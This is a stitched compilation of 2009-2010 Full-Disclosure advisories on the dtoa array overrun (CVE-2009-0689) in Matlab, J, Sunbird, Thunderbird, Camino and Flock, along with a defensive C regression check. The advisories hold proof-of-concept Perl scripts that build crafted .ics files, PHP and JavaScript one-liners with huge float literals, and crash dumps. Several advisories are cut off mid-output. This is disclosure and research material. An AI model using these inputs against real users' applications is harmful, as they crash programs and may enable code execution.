RELENG_8_0_BP
RELENG_8_0_0_RELEASE
RELENG_8_0
RELENG_7
RELENG_6

Please note that the issue can also exist in Sony PlayStation 3.
The license of PS3 :

http://www.scei.co.jp/ps3-license/see.html

---
The separate 'dtoa.c' file is separately licenced, thus:
Copyright. 1991, 2000 by Lucent Technologies.
---

MacOS gdtoa have also  "Lucent 
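An added example that is not from the advisory: a regression check that feeds strtod(3) a constructed "0.111...1" mantissa of the PoC's size and verifies that the correctly rounded value of 1/9 comes back (on the unpatched dtoa this is the call that walks past freelist[Kmax]; a fixed libc simply returns the value), plus an input-length guard for programs that must keep running on a libc that cannot be patched. The same check applies to the Matlab, J and Sunbird advisories below, which describe the same dtoa bug. The digit limit of 4096 and the input sizes are assumptions chosen for the demonstration.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* "0." followed by `ndigits` ones: a constructed input with the shape of the
 * PoC strings above. The caller frees the result. */
static char *make_ones(size_t ndigits)
{
    char *s = malloc(ndigits + 3);
    if (!s) return NULL;
    s[0] = '0';
    s[1] = '.';
    memset(s + 2, '1', ndigits);
    s[ndigits + 2] = '\0';
    return s;
}

/* Regression check: 1 if strtod() consumes the whole string and returns the
 * correctly rounded double nearest 1/9 (every such string with roughly 20 or
 * more digits rounds to that same double), 0 on a partial or wrong result,
 * -1 on allocation failure. */
int long_mantissa_parses(size_t ndigits)
{
    char *s = make_ones(ndigits);
    if (!s) return -1;
    char *end = NULL;
    errno = 0;
    double v = strtod(s, &end);
    int ok = end == s + ndigits + 2 && errno == 0 && v == 1.0 / 9.0;
    free(s);
    return ok;
}

/* Input-side mitigation: count the digits and refuse anything longer than
 * `max_digits` before strtod() ever sees it (the overrun grows with the
 * number of mantissa digits). Returns 0 and stores the value, or -1 with
 * errno = EINVAL if the input is refused or is not a complete number. */
int bounded_strtod(const char *s, size_t max_digits, double *out)
{
    size_t digits = 0;
    for (const char *p = s; *p; p++)
        if (*p >= '0' && *p <= '9') digits++;
    if (digits > max_digits) { errno = EINVAL; return -1; }
    char *end = NULL;
    errno = 0;
    double v = strtod(s, &end);
    if (end == s || *end != '\0') { errno = EINVAL; return -1; }
    *out = v;
    return 0;
}

/* The constructed input pushed through the guard: 0 if accepted, -1 if refused. */
int guarded_parse(size_t ndigits, size_t max_digits)
{
    char *s = make_ones(ndigits);
    if (!s) return -1;
    double v = 0.0;
    int rc = bounded_strtod(s, max_digits, &v);
    free(s);
    return rc;
}
```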

[Full-disclosure] Matlab R2009b Array Overrun (code execution)

2010-01-08 Thread Maksymilian Arciemowicz
[ Matlab R2009b Array Overrun (code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 08.01.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Matlab R2009b

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/80


--- 0.Description ---
MATLAB is a numerical computing environment and fourth generation
programming language. Developed by The MathWorks, MATLAB allows matrix
manipulation, plotting of functions and data, implementation of
algorithms, creation of user interfaces, and interfacing with programs
in other languages. Although it is numeric only, an optional toolbox
uses the MuPAD symbolic engine, allowing access to computer algebra
capabilities. An additional package, Simulink, adds graphical
multidomain simulation and Model-Based Design for dynamic and embedded
systems.

In 2004, MathWorks claimed that MATLAB was used by more than one million
people across industry and the academic world


--- 1. Matlab 2009b Array Overrun (code execution) ---
The main problem exists in the dtoa implementation. Matlab has the same dtoa
as Mozilla, OpenBSD, MacOS, Google, Opera etc.,
and it is the same as SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create a floating-point number that will overwrite the memory. Kmax
is defined as 15. Functions in dtoa don't check the Kmax limit, and it
is possible to access elements >= 16 of the freelist array.


--- 2. Proof of Concept  (PoC) ---
There are several ways to make a successful attack. The simplest assumes the
creation of a script with a defective floating-point variable and
executing it. This allows the possibility of code execution.

-expl.m--
cxib=0.
-expl.m--

MATLAB crash file:C:\DOCUME~1\WinXPae\USTAWI~1\Temp\matlab_crash_dump.552

   Segmentation violation detected at Wed Dec 03 12:04:02 2009


Configuration:
  MATLAB Version:   7.9.0.529 (R2009b)
  MATLAB License:   [PRIV]
  Operating System: Microsoft Windows XP
  Window System:Version 5.1 (Build 2600: Dodatek Service Pack 3)
  Processor ID: x86 Family 6 Model 7 Stepping 6, GenuineIntel
  Virtual Machine:  Java 1.6.0_12-b04 with Sun Microsystems Inc. Java
HotSpot(TM) Client VM mixed mode
  Default Encoding:  windows-1250

Fault Count: 1

Register State:
  EAX = 71c71c71  EBX = 188ade48
  ECX = 000a  EDX = 188adde0
  ESI = 0002  EDI = 0003
  EBP = 00c3dec0  ESP = 00c3de90
  EIP = 7baf965e  FLG = 00010206

Stack Trace:
  [0] libut.dll:_Balloc(0x188adde0, 0x188ade48, 10, 1) + 14 bytes
  [1] libut.dll:_s2b(0x188adde0, 33, 33, 0x069f6bc7) + 112 bytes
  [2] libut.dll:_ut_strtod(0x188adde0, 0x19a80048
"0.11..", 0x00c3e024, 0x00c3e028) + 1123 bytes
  [3] m_ir.dll:_mps_parse_matlab_real(0x188ad9f0, 0x00c3e068, 11, 0) +
576 bytes
  [4] m_parser.dll:_mps_convert_M_NUMBER(0x188afb90, 0x1971d070,
0x1971d048, 0x188afb90) + 71 bytes
  [5] m_parser.dll:_mps_convert_lval(0x188afb90, 0x1971d048, 0x1971d070,
0) + 224 bytes
  [6] m_parser.dll:_mps_convert_M_Primary_4(0x188afb90, 0x1971d084,
0x1971d0e8, 0x188afb90) + 191 bytes
  [7] m_parser.dll:_mps_convert_M_Stmt_2(0x188afb90, 0x1971d0d4,
0x1971d0e8, 0x188afb90) + 247 bytes
  [8] m_parser.dll:_mps_convert_M_Stmts_2(0x188afb90, 0x1971d0e8,
0x188afb90, 0x199d95b0) + 703 bytes
  [9] m_parser.dll:_mps_make_M_body_from_parse_tree(0x1971d0e8, 0,
37, 0) + 1283 bytes
  [10] m_parser.dll:_mps_convert_script(0x00c3e788, 18, 0x00c3e550
"đĺĂ", 0x7a36323f) + 1073 bytes
  [11] m_parser.dll:_mps_convert_M_File_1(0x188afb90, 0x189b3960,
0x188afb90, 0x189b3960) + 66 bytes
  [12] m_parser.dll:_mps_M_to_IR_eval(0x00c3e7b4, 0x00c3e774,
0x00c3e778, 0x00c3e77c) + 1471 bytes
  [13] m_parser.dll:_mps_M_to_IR(0x00c3e80f, 0x00c3e7b4, 0x00c3e774,
0x00c3e778) + 307 bytes
  [14] m_interpreter.dll:public: void __thiscall
Mfh_mp::inCompileMfile(char const *)(0x03ba1a86 "C:\Documents And
Settings\WinXPa..", 1, 0x1977c300 "¤Ä.z", 0x0085) + 492 bytes
  [15] m_interpreter.dll:public: void __thiscall
Mfh_mp::inCompileMOrLoadPFile(void)(0, 0x7a1459e2, 1, 0x1977c300 "¤Ä.z")
+ 266 bytes
  [16] m_interpreter.dll:public: virtual void __thiscall
Mlm_mp::load_file(void)(0, 0x1977c300 "¤Ä.z", 0, 0x78134c58) + 32 bytes
  [17] m_dispatcher.dll:public: void __thiscall
Mlm_MATLAB_fn::try_load(void)(0x19728978, 0x78159334, 1, 0x00c3ee54
"ŘďĂ") + 71 bytes
  [18] m_dispatcher.dll:public: void __thiscall
Mlm_MATLAB_fn::load(void)(0, 0x19

[Full-disclosure] J 6.02.023 Array Overrun (code execution)

2010-01-08 Thread Maksymilian Arciemowicz
[ J 6.02.023 Array Overrun (code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 08.01.2010

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- J 6.02.023 Array Overrun (code execution)

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/79


--- 0.Description ---
The J programming language, developed in the early 1990s by Ken Iverson
and Roger Hui, is a synthesis of APL (also by Iverson) and the FP and FL
function-level languages created by John Backus.

To avoid repeating the APL special character problem, J requires only
the basic ASCII character set, resorting to the use of digraphs formed
using the dot or colon characters to extend the meaning of the basic
characters available. Additionally, to keep parsing and the language
simple, and to compensate for the lack of character variation in ASCII,
J treats many characters which might need to be balanced in other
languages (such as [] {} "" `` or <>) as stand alone tokens or (with
digraphs) treats them as part of a multi-character token.

Being an array programming language, J is very terse and powerful, and
is most suited to mathematical and statistical programming, especially
when performing operations on matrices. J is a MIMD language.

--- 1. J 6.02.023 Array Overrun (code execution) ---
The main problem exists in the dtoa implementation. J has the same dtoa as
MatLab, OpenBSD, MacOS, Google, Opera etc.,
and it is the same as SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create a floating-point number that will overwrite the memory. Kmax
is defined as 15. Functions in dtoa don't check the Kmax limit, and it
is possible to access elements >= 16 of the freelist array.


--- 2. Proof of Concept  (PoC) ---
There are several ways to make a successful attack. The simplest assumes the
creation of a script with a defective floating-point variable and
executing it. This allows the possibility of code execution.

-expl.ijs--
cxib=0.
-expl.ijs--

Program received signal SIGSEGV, Segmentation fault.
0x00452157 in ?? ()

eax0x4c2000 4988928
ecx0x2c667c 2909820
edx0x46d054 4640852
ebx0x48a607  296455
esp0x98f720 0x98f720
ebp0x98f77c 0x98f77c
esi0x436380870662152
edi0x0  0
eip0x452157 0x452157
eflags 0x10206  [ PF IF RF ]
cs 0x1b 27
ss 0x23 35
ds 0x23 35
es 0x23 35
fs 0x3b 59
gs 0x0  0

edi=0

(gdb) x/i $eip
0x452157:   test   %eax,(%eax)
(gdb) x/x $eax
0x4c2000:   0x


--- 3. SecurityReason Note ---
Officially SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock
- MatLab
- J

This list is not yet closed.


--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/li

[Full-disclosure] SecurityReason: Sunbird 0.9 Array Overrun (code execution) 0day

2009-12-11 Thread Maksymilian Arciemowicz
[ Sunbird 0.9 Array Overrun (code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-199
Risk: High
Remote: Yes

Affected Software:
- Sunbird 0.9

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/77


--- 0.Description ---
Mozilla Sunbird is a cross-platform calendar application, built upon
Mozilla Toolkit. Our goal is to provide you with a full-featured and
easy to use calendar application that you can use around the world.


--- 1. Sunbird 0.9 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. Sunbird has the same dtoa
as Firefox, etc. The problem exists in the js3250.dll (version 4.0.0 - Netscape
32-bit JavaScript Module) DLL library

and it is the same as SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create a floating-point number that will overwrite the memory. Kmax
is defined as 15. Functions in dtoa don't check the Kmax limit, and
it is possible to access elements >= 16 of the freelist array.


--- 2. Proof of Concept  (PoC) ---

If we use Sunbird to open or import a crafted "ics" file, Sunbird will
crash. For example:

---
#!/usr/bin/perl
# SecurityReason.com
# sp3x
# tested on WinXp SP3
use strict;
use warnings;

# iCalendar header: one VTIMEZONE block followed by the start of a VEVENT
my $header = "BEGIN:VCALENDAR\n".
"PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n".
"VERSION:2.0\n".
"BEGIN:VTIMEZONE\n".
"TZID:Europe/Prague\n".
"X-LIC-LOCATION:Europe/Prague\n".
"BEGIN:DAYLIGHT\n".
"TZOFFSETFROM:+0100\n".
"TZOFFSETTO:+0200\n".
"TZNAME:CEST\n".
"DTSTART:19700329T02\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n".
"END:DAYLIGHT\n".
"BEGIN:STANDARD\n".
"TZOFFSETFROM:+0200\n".
"TZOFFSETTO:+0100\n".
"TZNAME:CET\n".
"DTSTART:19701025T03\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n".
"END:STANDARD\n".
"END:VTIMEZONE\n".
"BEGIN:VEVENT\n".
"CREATED:20091117T095214Z\n".
"LAST-MODIFIED:20091117T095217Z\n".
"DTSTAMP:20091117T095214Z\n".
"UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n";
# the SUMMARY value is the float literal "0." followed by 296450 ones
my $s = "SUMMARY:0.";
my $expl = "1" x 296450;
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T11\n".
"DTEND;TZID=Europe/Prague:20100111T12\n".
"END:VEVENT\n".
"END:VCALENDAR\n";

# write (not append) so that repeated runs do not concatenate calendars
open(my $fh, '>', 'test.ics') or die "cannot open test.ics: $!";
print $fh $header.$s.$expl.$footer;
close($fh);
---

0:000> r
eax=015e06f9 ebx=0001 ecx=658cebec edx=0002 esi=015e0710
edi=015e06f9
eip=600f154f esp=0012e330 ebp=0012e35c iopl=0 nv up ei pl nz na
pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=
efl=00010206
js3250!JS_strtod+0xb0a:
600f154f 8b01            mov     eax,dword ptr [ecx]
ds:0023:658cebec=
0:000> ub 600f1551
js3250!JS_strtod+0xaf2:
600f1537 83c414          add     esp,14h
600f153a 8b75fc          mov     esi,dword ptr [ebp-4]
600f153d e96bf5          jmp     js3250!JS_strtod+0x68 (600f0aad)
600f1542 56              push    esi
600f1543 57              push    edi
600f1544 8b7c240c        mov     edi,dword ptr [esp+0Ch]
600f1548 8d0cbd08d01460  lea     ecx,js3250!js_XMLClass+0x560 (6014d008)[edi*4]
600f154f 8b01            mov     eax,dword ptr [ecx]
0:000> !exchain
0012fc9c: USER32!_except_handler3+0 (7e39048f)
  CRT scope  0, func:   USER32!UserCallWinProc+10a (7e39ac2d)
0012fcf4: USER32!_except_handler3+0 (7e39048f)
  CRT scope  0, filter: USER32!DispatchMessageWorker+113 (7e39074a)
func:   USER32!DispatchMessageWorker+126 (7e390762)
0012fd5c: sunbird!jpeg_mem_term+eb7 (00849745)
0012ffb0: sunbird!jpeg_fdct_islow+266a4 (00848818)
0012ffe0: kernel32!_except_handler3+0 (7c839ac0)
  CRT scope  0, filter: kernel32!BaseProcessStart+29 (7c843882)
func:   kernel32!BaseProcessStart+3a (7c843898)
Invalid exception stack at 
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be
wrong.
0012e35c 600f15f3 js3250!JS_strtod+0xb0a
0012e37c 600f0ef9 js3250!JS_strtod+0xbae
0012e3f4 6010e8eb js3250!JS_strtod+0x4b4
0012e448 6010e3c6 js3250!JSLL_MinInt+0x1dcf
0012e46c 60103fb5 js3250!JSLL_MinInt+0x18aa
0012e5dc 6010195e js3250!js_Invoke+0x2c1b
0012e694 60101cb2 js3250!js_Invoke+0x5c4
0012e71c 60101e0a js3250!js_Invoke+0x918
0012e74c 6011350d js3250!js_Invoke+0xa70
0012e7a4 600e3c41 js3250!js_FindProperty+0x974
0012e7bc 004274cf js3250!JS_SetProperty+0x36
0012e978 0042593e sunbird!NS_RegistryGetFactory+

[Full-disclosure] SecurityReason: Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution)

2009-12-11 Thread Maksymilian Arciemowicz
[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code
execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Thunderbird 2.0.0.23

Fixed in:
- Thunderbird 3.0
- Thunderbird 2.0.0.24pre

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/78


--- 0.Description ---
Thunderbird 2 includes many new features to help you manage your inbox.
With Thunderbird 2, it's easier to prioritize and find your important
email with tags and the new find bar helps you find content within your
email faster.
Lightning brings the Sunbird calendar to the popular email client,
Mozilla Thunderbird. Since it's an extension, Lightning is tightly
integrated with Thunderbird, allowing it to easily perform email-related
calendaring tasks.


--- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code
execution) ---
The main problem exists in the dtoa implementation. Thunderbird has the same
dtoa as Firefox, etc. This problem affects many additional Add-ons for
Thunderbird.

Example for affected Add-ons:
- Lightning 0.9
- Thunderbrowse 3.2.6.7
- more

and it is the same as SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar ones is in SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

We can create a float of any length, which will overwrite the memory.
Kmax is defined as 15. Functions in dtoa don't check the Kmax limit, and
it is possible to access elements >= 16 of the freelist array.


--- 2. Proof of Concept (PoC) ---

(PoC for Lightning )
---
#!/usr/bin/perl
# SecurityReason.com
# sp3x
# tested on WinXp SP3
use strict;
use warnings;

# iCalendar header: one VTIMEZONE block followed by the start of a VEVENT
my $header = "BEGIN:VCALENDAR\n".
"PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n".
"VERSION:2.0\n".
"BEGIN:VTIMEZONE\n".
"TZID:Europe/Prague\n".
"X-LIC-LOCATION:Europe/Prague\n".
"BEGIN:DAYLIGHT\n".
"TZOFFSETFROM:+0100\n".
"TZOFFSETTO:+0200\n".
"TZNAME:CEST\n".
"DTSTART:19700329T02\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n".
"END:DAYLIGHT\n".
"BEGIN:STANDARD\n".
"TZOFFSETFROM:+0200\n".
"TZOFFSETTO:+0100\n".
"TZNAME:CET\n".
"DTSTART:19701025T03\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n".
"END:STANDARD\n".
"END:VTIMEZONE\n".
"BEGIN:VEVENT\n".
"CREATED:20091117T095214Z\n".
"LAST-MODIFIED:20091117T095217Z\n".
"DTSTAMP:20091117T095214Z\n".
"UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n";
# the SUMMARY value is the float literal "0." followed by 296450 ones
my $s = "SUMMARY:0.";
my $expl = "1" x 296450;
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T11\n".
"DTEND;TZID=Europe/Prague:20100111T12\n".
"END:VEVENT\n".
"END:VCALENDAR\n";

# write (not append) so that repeated runs do not concatenate calendars
open(my $fh, '>', 'test.ics') or die "cannot open test.ics: $!";
print $fh $header.$s.$expl.$footer;
close($fh);
---

(PoC for Thunderbrowse )
---

var a=0.<?php echo str_repeat("1",33); ?>;

---

When we use Thunderbrowse to see this site, Thunderbird will crash with:

Program terminated with signal 11, Segmentation fault.
#0  0xbb15d1e7 in ?? ()

eax            0x0      0
ecx            0xa      10
edx            0x0      0
ebx            0xbb16eb38       -1156125896
esp            0xbfbfce58       0xbfbfce58
ebp            0xbfbfce74       0xbfbfce74
esi            0xb      11
edi            0xb768e700       -1217861888
eip            0xbb15d1e7       0xbb15d1e7
eflags         0x282    [ SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0xab     171
gs             0xb3     179

(gdb) x/x ($eip)
0xbb15d1e7:     Cannot access memory at address 0xbb15d1e7
(gdb) x/x ($esi)
0xb:    Cannot access memory at address 0xb
(gdb) x/x ($edi)
0xb768e700:     0x1c71c71c

now esi=0xb and edi=0x1c71c71c

(gdb) x/20x ($edi)
0xb768e700: 0x1c71c71c  0xc71c71c7  0x71c71c71  0x1c71c71c
0xb768e710: 0xc71c71c7  0x71c71c71  0x1c71c71c  0xc71c71c7
0xb768e720: 0x71c71c71  0x1c71c71c  0xc71c71c7  0x71c71c71
0xb768e730: 0x1c71c71c  0xc71c71c7  0x71c71c71  0x1c71c71c
0xb768e740: 0xc71c71c7  0x71c71c71  0x1c71c71c  0xc71c71c7

(gdb) x/50x ($edi)+37000
0xb7697788: 0xc71c71c7  0x71c71c71  0x1c71c71c  0xc71c71c7
0xb7697798: 0x71c71c71  0x1c71c71c  0xc71c71c7  0x71c71c71
0xb76977a8: 0x1c71c71c  0xc71c71c7  0x71c71c71  0x1c71c71c
0xb76977b8: 0xc71c71c7  0x71

[Full-disclosure] SecurityReason: Camino 1.6.10 Remote Array Overrun (Arbitrary code execution)

2009-12-11 Thread Maksymilian Arciemowicz
[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Camino 1.6.10

Fixed in:
- Camino 2.0 <=

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/76


--- 0.Description ---
Camino (from the Spanish word camino meaning "way", "path" or "road") is
a free, open source, GUI-based Web browser based on Mozilla's Gecko
layout engine and specifically designed for the Mac OS X operating
system. In place of an XUL-based user interface used by most
Mozilla-based applications, Camino uses Mac-native Cocoa APIs, although
it does not use native text boxes.

--- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. Camino has the same dtoa
as Firefox, SeaMonkey, Chrome, Opera etc.,
and it is the same as SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar ones is in SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

We can create a float of any length, which will overwrite the memory.
Kmax is defined as 15. Functions in dtoa don't check the Kmax limit, and
it is possible to access elements >= 16 of the freelist array.


--- 2. Proof of Concept (PoC) ---
---

var a=0.<?php echo str_repeat("1",296450); ?>;

---

Process: Camino [153]
Path:            /Volumes/Camino/Camino.app/Contents/MacOS/Camino
Identifier:  org.mozilla.camino
Version: 1.6.10 (1609.09.25)
Code Type:   X86 (Native)
Parent Process:  launchd [92]

Date/Time:   2009-11-06 12:57:24.698 -0800
OS Version:  Mac OS X 10.5.6 (9G55)
Report Version:  6

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x7e33d590
Crashed Thread:  0

Thread 0 Crashed:
0   libSystem.B.dylib   0x01d7e325 tiny_malloc_from_free_list
+ 235
1   libSystem.B.dylib   0x01d7710d szone_malloc + 180
2   libSystem.B.dylib   0x01d77018 malloc_zone_malloc + 81
3   libSystem.B.dylib   0x01d76fac malloc + 55
4   libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220
5   org.mozilla.camino  0x00389bac RuleHash::RuleHash(int) + 282
6   org.mozilla.camino  0x0038ae0e
nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146
7   org.mozilla.camino  0x0038b215
nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27
8   org.mozilla.camino  0x003afbd0
EnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24
9   org.mozilla.camino  0x003b0885 nsStyleSet::FileRules(int
(*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37
10  org.mozilla.camino  0x003b0c77
nsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*,
nsStyleContext*, nsICSSPseudoComparator*) + 123
11  org.mozilla.camino  0x002cc924
nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134
12  org.mozilla.camino  0x002f617b
PresShell::InitialReflow(int, int) + 1151
13  org.mozilla.camino  0x005a90d4
nsContentSink::StartLayout(int) + 342
14  org.mozilla.camino  0x00483354
HTMLContentSink::StartLayout() + 82
15  org.mozilla.camino  0x00486cb7
HTMLContentSink::OpenBody(nsIParserNode const&) + 193
16  org.mozilla.camino  0x001a60e8
CNavDTD::OpenBody(nsCParserNode const*) + 54
17  org.mozilla.camino  0x001a8b53
CNavDTD::HandleDefaultStartToken(CToken*, nsHTMLTag, nsCParserNode*) + 393
18  org.mozilla.camino  0x001aa3e5
CNavDTD::HandleStartToken(CToken*) + 623
19  org.mozilla.camino  0x0012
CNavDTD::HandleToken(CToken*, nsIParser*) + 1358
20  org.mozilla.camino  0x001a9a4d
CNavDTD::BuildModel(nsIParser*, nsITokenizer*, nsITokenObserver*,
nsIContentSink*) + 165
21  org.mozilla.camino  0x001a94ee
CNavDTD::DidBuildModel(unsigned int, int, nsIParser*, nsIContentSink*) + 550
22  org.mozilla.camino  0x001b5e28
nsParser::DidBuildModel(unsigned int) + 90
23  org.mozilla.camino  0x001b83c7 nsParser::ResumeParse(int,
int, int) + 661
24  org.mozilla.camino  0x001b59a8
nsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 128
25  org.mozilla.camino  0x002076a0
nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, unsigned
int) + 88
26  org.mozilla.camino  0x000f522a
nsFileChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 78
27

[Full-disclosure] SecurityReason: Flock 2.5.2 Remote Array Overrun (Arbitrary code execution)

2009-12-11 Thread Maksymilian Arciemowicz
[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Flock 2.5.2

Fixed in:
- Flock 2.5.5

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/75


--- 0.Description ---
Flock is a web browser built on Mozilla's Firefox codebase that
specializes in providing social networking and Web 2.0 facilities built
into its user interface. Flock v2.5 was officially released on May 19, 2009.

The Flock browser is available as a free download, and supports
Microsoft Windows, Mac OS X, and Linux platforms.


--- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. Flock has the same dtoa
as Firefox, SeaMonkey, Chrome, Opera etc.,
and it is the same as SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar ones is in SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

We can create a float of any length, which will overwrite the memory.
Kmax is defined as 15. Functions in dtoa don't check the Kmax limit, and
it is possible to access elements >= 16 of the freelist array.


--- 2. Proof of Concept (PoC) ---
---

var a=0.<?php echo str_repeat("1",296450); ?>;

---

Program received signal SIGSEGV, Segmentation fault.
0x67c68740 in js3250!JS_DHashTableEnumerate ()
   from C:\Program Files\Flock\js3250.dll
(gdb) i r
eax            0x964619c7       -1773790777
ecx            0x2      2
edx            0x2      2
ebx            0x2      2
esp            0x20e7f0         0x20e7f0
ebp            0x1      0x1
esi            0x299d700        43636480
edi            0x299d701        43636481
eip            0x67c68740       0x67c68740

eflags         0x210202         [ IF RF ID ]
cs             0x1b     27
ss             0x23     35
